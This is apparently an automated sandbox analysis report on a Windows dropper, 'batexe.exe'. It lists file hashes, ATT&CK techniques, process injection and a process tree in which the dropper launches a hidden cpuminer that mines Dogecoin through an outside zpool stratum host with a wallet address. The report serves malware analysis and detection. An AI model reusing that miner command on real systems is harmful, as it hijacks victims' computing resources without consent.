73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
299s
max time network
309s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
12/02/2024, 05:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
3228	b2e.exe
1628	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
1628	cpuminer-sse2.exe
1628	cpuminer-sse2.exe
1628	cpuminer-sse2.exe
1628	cpuminer-sse2.exe
1628	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4364-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4364 wrote to memory of 3228	4364	batexe.exe	83
PID 4364 wrote to memory of 3228	4364	batexe.exe	83
PID 4364 wrote to memory of 3228	4364	batexe.exe	83
PID 3228 wrote to memory of 1740	3228	b2e.exe	84
PID 3228 wrote to memory of 1740	3228	b2e.exe	84
PID 3228 wrote to memory of 1740	3228	b2e.exe	84
PID 1740 wrote to memory of 1628	1740	cmd.exe	87
PID 1740 wrote to memory of 1628	1740	cmd.exe	87

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4364
- C:\Users\Admin\AppData\Local\Temp\B16E.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\B16E.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\B16E.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3228
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BC3B.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1740
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1628

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\B16E.tmp\b2e.exe

Filesize
247KB

MD5
5044494b7bea7684a7ef5e3d8b24e4bd

SHA1
ab031e7260f367027a7f07f02c42bcf0b307a401

SHA256
187b7d7756fafd15da983170e13ebb02a44998d8c27791a5fd54fa4146c5a242

SHA512
fb4f480bf2c168ebdbbe2e69f92e38446f4e25b0684308e7e99ab23e1d6bc7e9fd094c1a8bed968b56f255ed4692ffa49b91efcef6a895bcefe680f4f1bd646c

Download Submit
C:\Users\Admin\AppData\Local\Temp\B16E.tmp\b2e.exe

Filesize
2.0MB

MD5
39f5cf3c3f73776bf02aa4d94c4b3ad7

SHA1
24eed013836b3982e5b955d75cbe66787cc17a2f

SHA256
4605da9b03e35d5cf71aee2b31c99081528b659a1597640fc0d39a8cbf5189bb

SHA512
22330c962babb0aa9d16229a267f86c90f67d7d8cf2c1c55caaef13529a388883efb2c96d8db6f9fc987209fb9d344a49472f45c7d8c58900a34e5a8617686eb

Download Submit
C:\Users\Admin\AppData\Local\Temp\B16E.tmp\b2e.exe

Filesize
2.8MB

MD5
271f1f58742aff0ebf71fc0c3ab4a9cf

SHA1
63ef4434110ac1ca03865b31406c2921e58bed73

SHA256
9f712a59b09b14ca76baae87d480dac0b1c38e4c7eea45140c28997774690279

SHA512
18ade3b96c697954d59b8697eadae2cbdd856ebe9885f21d2966041e5dbbe9d9e150954105154f92bd78d1c3100435791b20a105d708b62986cc8910c362dccc

Download Submit
C:\Users\Admin\AppData\Local\Temp\BC3B.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.7MB

MD5
e53342429afeb5ad940afd80122741cb

SHA1
0c091be0f5f5638ae83d0866af63694f6a4cbf94

SHA256
6f0d9dc36bef24e0249da178524566d74255a0a68e13b11defaf32b9b4b831d6

SHA512
4a39b822417acdb36fa0a07e9ca9b50ed3ae639e67ba5b4a78c4aceb88b8093bc3a27e659526769729e4ce9702e82990b4284f91beca0b3a27228a39744a51ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.4MB

MD5
6c9fc2ba0b6625e198b3da6ebd7fb595

SHA1
b0e2d0f826f07f7d1314f442fba2f4d19e15ba37

SHA256
b162baf7a453cfd900a171f927cd091808e5b7a4efdba1e2f87058f00490fe8b

SHA512
1e1a90bbf33f7c23b8693746d5cbc5ca47b188cd39cf332f526d12dbcae47298f99c68366999e117f0a8b485ca076d6f8ef8286c630a44164640721d02190d6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
301KB

MD5
526f82839d682d3a23dd3158454d2c15

SHA1
9d8756d118e390193ce4e82329df6f60a0a660f6

SHA256
f942351b4dcaf42d6a4cf6d3788447b94e3839b3f5d2344b3f76b83dec08472d

SHA512
720e3d65c6aa09ccc2960f1460a4efad0d07fe29902c68c054ea4013bf9c4f676601df2046387544f5a1ab8af113406fff7c75e96d119bbca8a2e17893dc753b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
758KB

MD5
455c6bc22fd71095ee7103b176008737

SHA1
b7d828c0188f65263945a1aeefac2bd19a80c59b

SHA256
f11fa59178c604176dcff8cf320b3ddca4cfc46b3483ae0e0c29e5ce38fdb6d1

SHA512
64886619af93f3a3992d3706c1ec14b0b965f74e79670a47ae187e08859d37339b31f875b8d327bf61c1499e4737751fb8073d4cb4d71d368ee38a417773ae83

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.1MB

MD5
c92c77f1a0ac6f5dc252a0e6187d8345

SHA1
f7814840f3adb7a5f510c3cd772682d5542880d4

SHA256
2fc1c2da730cdbdf707f77739c0a6ccd5f598b75d7dcff31eed0f68549f1e043

SHA512
dcc271087d055c897b6f5ca858da460861a32f18100a211d794b57778f1c51b06f627e979ecb7e0c9fd06c2f41e4dbcfc168a21611810f867b14d033aab74111

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
243KB

MD5
25b7f08b425509a67bfc02659a48ea90

SHA1
c6a73b7893db4e217714c70cf003a5ff691ca96a

SHA256
4bfcb8e0037608b2ec2f35cd07fde7b3797837f60d68a023e8db7c03947dd0c0

SHA512
7c1b895f4c2fad2a56bbd2eab6fc64addf18dfdc43ec937dc87cb03f6b50253373f6a5fdbbaf3469d3ebf741bf3c7052026b730a455d932b18665d700e6289ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
491KB

MD5
a563f0d3d6891098cdbee9f5f9b6581a

SHA1
5ea35738c974bf98b0b5e616f1002e7e41b8f1c7

SHA256
1d51dff386cd7aba6a59d9a35054205abd13c88a0b6824c88f5cfe5972fd31e0

SHA512
63db18a9e5b716780be802ba1ed3f06f0681c4dcd575c38982ab1cea61bb5030fcc8df7e3aa1ccf31415d2892abc4ec9e1157ff0c4f9f37179dffae7cd6db2ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
239KB

MD5
b8a8f615bc58247cbe1fb1ea05dfc82e

SHA1
5948430eefd07015fa8503a70628cd6318850d71

SHA256
bfc85b53f933d883ec94afa24f3fa556527d47bd03dd1bcfaf24dd0dbe7f7a95

SHA512
a6ea61e4a675819138c62ad1f0b2cb51fd25398ed1618cdc5a71436a496a292b9972415be91f302748f590b149c548ba74a67db56730d7c7550681df57823612

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
280KB

MD5
aa18e89850cd7c9e5177139835eef348

SHA1
7e0521c7fff8ed0f4f5603e90fcdaf5118301a61

SHA256
7f385443ce6b70c4863a40f4adfa8847106a45aea457dedf858eb3f20723bac8

SHA512
d66fb206bcfb893ef6ca997077de62bad2f6bb3df2d027b767dd2bf93e6342f56ffae3d29b83f4ba2f0d9ac4709e66f7644ccdb8a494dd2737a4feeab5689cfe

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
548KB

MD5
e4dcf30897e35dbbcb9d8f3ed1589a1b

SHA1
f79a2d56307a4d6a3d73e490bf64b0546d30711c

SHA256
6eabb4f00478ab2a42c806d6e1d19b4d344d03d71ef563b027b0f3d84e876fca

SHA512
06eac8634d5f1b7825c643b31ff45e7f69f6083e377bf70398dd21bd7e2b38c5ef7c835490ee37473ee55cf963346da0492343740c5336eecae83eeb3be5f925

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
468KB

MD5
0bcd6b41a4ca37885cfe661fa8d58d74

SHA1
734abc3eca4d371a1137b22ec6a54ec88279836c

SHA256
151a4a02c90ea43f93ef22ed00024ed9f5000101af2cba6ae26bab2a1a210de4

SHA512
753098d9e99b600569b73b2a08efd8c62941ed247bc927000b31217948299b49e47ccb2eb7640fde91ca8edc8042e84073bfff8125ca5a987dbdb74b697521be

Download Submit
memory/1628-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1628-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1628-46-0x00000000758A0000-0x0000000075938000-memory.dmp

Filesize
608KB

Download
memory/1628-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1628-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/1628-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1628-47-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/1628-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1628-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1628-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1628-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1628-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1628-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1628-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1628-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1628-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3228-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3228-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4364-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download